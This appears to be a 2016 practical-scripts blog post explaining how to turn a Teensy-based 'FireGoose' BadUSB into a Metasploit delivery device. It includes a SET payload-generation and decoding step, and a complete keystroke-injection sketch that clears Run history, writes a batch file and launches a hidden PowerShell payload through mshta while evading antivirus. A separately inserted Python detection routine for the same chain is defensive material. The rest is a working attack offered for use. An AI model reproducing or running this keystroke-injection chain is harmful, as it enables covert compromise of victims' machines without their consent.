BadUSB (烧鹅 / FireGoose) running a Metasploit payload

Author: admin  Category: Practical scripts  Published: 2016-05-23 23:11

Bypasses 360 Safeguard (360 安全卫士).

Use the Social-Engineer Toolkit (S.E.T) to generate a PowerShell Metasploit payload.

Select the following options:

1) Social-Engineering Attacks
9) Powershell Attack Vectors
1) Powershell Alphanumeric Shellcode Injector

Payload code:

/root/.set/reports/powershell/x86_powershell_injection.txt

The code can be used as-is, but it is too long to type in through the Teensy's keyboard emulation.

So it is delivered as a file instead (it could also be written straight into a .bat, but a batch file performing sensitive operations is easily killed by antivirus!).

The payload is base64 + UTF-16LE encoded.

Decode it:

awk '{print $7}' x86_powershell_injection.txt | base64 -d | iconv -f UTF-16LE -t ASCII -c >/var/www/html/pp.txt

Change the volume label of the 烧鹅 (FireGoose) drive to FireGoose.

Save the payload on the FireGoose drive as files/Fire_shell.ps1.

Write the sketch to the Teensy:


void setup()
{
  delay(5000);
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.print("cmd /T:01 /K mode CON: COLS=16 LINES=1"); // open a very small cmd window
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(200);
  Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); // clear the Run dialog history
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.println("del /f /q %tmp%\\w.bat 2>nul"); // delete any batch file left over from before
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.println("copy con %tmp%\\w.bat"); // write a new batch file
  Keyboard.send_now();
  Keyboard.println("@echo off");
  Keyboard.println("chcp 936");
  Keyboard.println(":lp");
  Keyboard.println("ping 127.1 -n 5 >nul");
  Keyboard.println("for /F %%A in ('wmic volume get driveletter^,label ^| find /i \"FireGoose\"') do (set Fire=%%A)"); // use wmic to check whether the specified USB drive is plugged in
  Keyboard.println("IF EXIST \"%Fire%\\files\\Fire_shell.ps1\" (copy /y \"%Fire%\\files\\Fire_shell.ps1\" %tmp%\\"); // if the file exists, copy it to %tmp%
  Keyboard.println("mshta vbscript:createobject^(\"wscript.shell\"^).run^(\"powershell -NoP -NonI -W Hidden -Exec Bypass -file %tmp%\\Fire_shell.ps1\",0^)^(window.close^)) ELSE (goto :lp )"); // use VBScript to run it hidden
  Keyboard.set_modifier(MODIFIERKEY_CTRL); // Ctrl+Z saves the batch file written above
  Keyboard.set_key1(KEY_Z);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(200);
  Keyboard.println("mshta vbscript:createobject(\"wscript.shell\").run(\"%tmp%\\w.bat\",0)(window.close) && exit"); // run w.bat hidden via VBScript and exit
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_modifier(0); // release all keys
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void loop()
{
}
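From the defender's side, the chain the sketch types in leaves a distinctive trail in process-creation telemetry: a cmd window shrunk with mode CON, a reg delete of the RunMRU key, mshta launched with an inline vbscript: URI, and a hidden PowerShell with -Exec Bypass whose parent is mshta. The following triage routine is an added example, not code from the original post or the FireGoose project; the record layout and the sample command lines are assumptions modelled on Sysmon Event ID 1 and on the commands shown on this page.

```python
import re

# Constructed Sysmon-style process-creation records mirroring this page's chain;
# not real telemetry. The last record is benign noise to show the rules stay quiet.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /T:01 /K mode CON: COLS=16 LINES=1"},
    {"Image": r"C:\Windows\System32\reg.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'mshta vbscript:createobject("wscript.shell").run("C:\Users\u\AppData\Local\Temp\w.bat",0)(window.close)'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell -NoP -NonI -W Hidden -Exec Bypass -file C:\Users\u\AppData\Local\Temp\Fire_shell.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe report.txt"},
]

# (rule name, image regex, command-line regex, parent-image regex or None)
RULES = [
    ("tiny_console_window", r"cmd\.exe$", r"/K\s+mode\s+CON:\s+COLS=\d+\s+LINES=\d+", None),
    ("runmru_history_wipe", r"reg\.exe$", r"reg\s+delete\s+.*\\Explorer\\RunMRU\b", None),
    ("mshta_inline_vbscript", r"mshta\.exe$", r"^mshta\s+vbscript:", None),
    ("hidden_bypass_powershell", r"powershell\.exe$",
     r"-W\s+Hidden\b.*-Exec\s+Bypass\b", r"mshta\.exe$"),
]


def matched_rules(event):
    """Names of every rule that fires on a single process-creation record."""
    hits = []
    for name, image_re, cmd_re, parent_re in RULES:
        if not re.search(image_re, event["Image"], re.I):
            continue
        if not re.search(cmd_re, event["CommandLine"], re.I):
            continue
        if parent_re and not re.search(parent_re, event["ParentImage"], re.I):
            continue
        hits.append(name)
    return hits


def triage(events, min_rules=3):
    """Flag a host when enough distinct stages of the chain appear in its event stream.
    Any single rule (the mode CON one especially) can be noisy; the combination is not."""
    flagged, rules = [], set()
    for index, event in enumerate(events):
        hits = matched_rules(event)
        if hits:
            flagged.append(index)
            rules.update(hits)
    return {"suspicious": len(rules) >= min_rules, "rules": sorted(rules), "flagged": flagged}
```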

There are many ways to get it plugged in.

Plug in the FireGoose and the session comes online.

Related references:
http://blog.csdn.net/b0rn_t0_w1n/article/details/50166435
https://github.com/RadioWar/FireGoose
https://gist.github.com/coldfusion39/4761f1494873d14d1147
http://www.pjrc.com/teensy/td_keyboard.html

Related downloads
Teensy:
https://www.pjrc.com/teensy/td_128/TeensyduinoInstall.exe

Arduino:
https://downloads.arduino.cc/arduino-1.6.8-windows.zip

For more, see: wiki.radiowar.org
